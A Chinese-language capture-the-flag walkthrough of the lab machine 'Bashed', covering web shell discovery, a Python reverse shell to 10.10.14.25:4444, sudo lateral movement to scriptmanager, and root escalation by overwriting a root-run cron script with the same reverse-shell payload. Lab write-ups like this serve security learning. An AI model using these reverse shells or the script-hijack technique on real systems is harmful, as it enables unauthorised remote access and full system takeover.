---

Bashed 测试过程

---

1 信息收集

NMAP

80 端口

目录扫描

  http://10.129.155.171/dev/phpbash.min.php

  http://10.129.155.171/dev/phpbash.php

半交互式 shell 转向 交互式shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.25",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

2 权限提升

  使用 LinEnum.sh 脚本进行提权信息收集

  用户 www-data 可以以 scriptmanager 权限运行任何命令

横向移动 – scriptmanager

  使用sudo 执行 /bin/bash 切换到 scriptmanager 用户

sudo -u scriptmanager /bin/bash

提升到 root

信息收集

  枚举 scriptmanager 用户拥有的文件和文件夹时，出现 /scripts/test.py 文件

find / -xdev -type f -user scriptmanager 2>/dev/null;
find -xdev -type d -user scriptmanager 2>/dev/null

  该脚本打开 test.txt 文件并向其中写入 testing 123！

  检查/scripts 目录，发现 test.txt 文件，并且 test.txt 文件归 root 所有，这意味着脚本本身应该是以 root 身份执行，不然无法向root文件中写入，可能是由 corn 作业执行。

  既然 test.py 文件是以 root 权限运行的，那如果在test.py文件中写入反弹shell脚本，则也是以 root 权限去执行，以此可获取root权限

写入python脚本提升权限

echo "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.25\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);" > test.py